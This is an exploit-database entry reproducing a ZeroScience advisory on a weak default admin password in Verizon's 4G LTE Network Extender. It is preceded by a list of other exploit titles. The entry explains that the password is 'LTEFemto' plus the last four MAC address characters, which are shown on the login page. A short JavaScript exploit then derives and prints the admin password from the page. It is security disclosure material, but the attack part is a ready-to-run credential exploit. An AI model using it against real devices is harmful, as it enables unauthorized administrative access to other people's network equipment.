
21 changes to exploits/shellcodes Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path 7-zip - Code Execution / Local Privilege Escalation PTPublisher v2.3.4 - Unquoted Service Path EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path Zyxel NWA-1100-NH - Command Injection ManageEngine ADSelfService Plus 6.1 - User Enumeration Verizon 4G LTE Network Extender - Weak Credentials Algorithm Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF) Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS) Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure Scriptcase 9.7 - Remote Code Execution (RCE) WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection Easy Appointments 1.4.2 - Information Disclosure WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS) WordPress Plugin Popup Maker 1.16.5 - Stored Cross-Site Scripting (Authenticated) REDCap 11.3.9 - Stored Cross Site Scripting PKP Open Journals System 3.3 - Cross-Site Scripting (XSS) WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated) Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)
67 lines
No EOL
2 KiB
Text
67 lines
No EOL
2 KiB
Text
Exploit Title: Verizon 4G LTE Network Extender - Weak Credentials Algorithm
|
|
Exploit Author: LiquidWorm
|
|
|
|
|
|
Vendor: Verizon Communications Inc.
|
|
Product web page: https://www.verizon.com
|
|
Affected version: GA4.38 - V0.4.038.2131
|
|
|
|
Summary: An LTE Network Extender enhances your indoor and 4G
|
|
LTE data and voice coverage to provide better service for your
|
|
4G LTE mobile devices. It's an extension of our 4G LTE network
|
|
that's placed directly in your home or office. The LTE Network
|
|
Extender works with all Verizon-sold 4G LTE mobile devices for
|
|
4G LTE data service and HD Voice-capable 4G LTE devices for voice
|
|
service. This easy-to-install device operates like a miniature
|
|
cell tower that plugs into your existing high-speed broadband
|
|
connection to communicate with the Verizon wireless network.
|
|
|
|
Desc: Verizon's 4G LTE Network Extender is utilising a weak
|
|
default admin password generation algorithm. The password is
|
|
generated using the last 4 values from device's MAC address
|
|
which is disclosed on the main webUI login page to an unauthenticated
|
|
attacker. The values are then concatenated with the string
|
|
'LTEFemto' resulting in something like 'LTEFemtoD080' as the
|
|
default Admin password.
|
|
|
|
Tested on: lighttpd-web
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2022-5701
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5701.php
|
|
|
|
|
|
17.02.2022
|
|
|
|
--
|
|
|
|
|
|
snippet:///Exploit
|
|
//
|
|
// Verizon 4G LTE Network Extender Super Awesome JS Exploit
|
|
//
|
|
|
|
console.log("Calling 'isDefaultPassword' API");
|
|
let req = new Request("/webapi/isDefaultPassword");
|
|
let def = req.url;
|
|
|
|
const doAjax = async () => {
|
|
const resp = await fetch(def);
|
|
if (resp.ok) {
|
|
const jsonyo = await resp.json();
|
|
return Promise.resolve(jsonyo);
|
|
} else {
|
|
return Promise.reject("Smth not rite captain!");
|
|
}
|
|
}
|
|
doAjax().then(console.log).catch(console.log);
|
|
|
|
await new Promise(t => setTimeout(t, 1337));
|
|
|
|
console.log("Verizon Admin Password: ");
|
|
let mac = document.querySelector("#mac_address").innerHTML;
|
|
console.log("LTEFemto" + mac.substr(-4)); |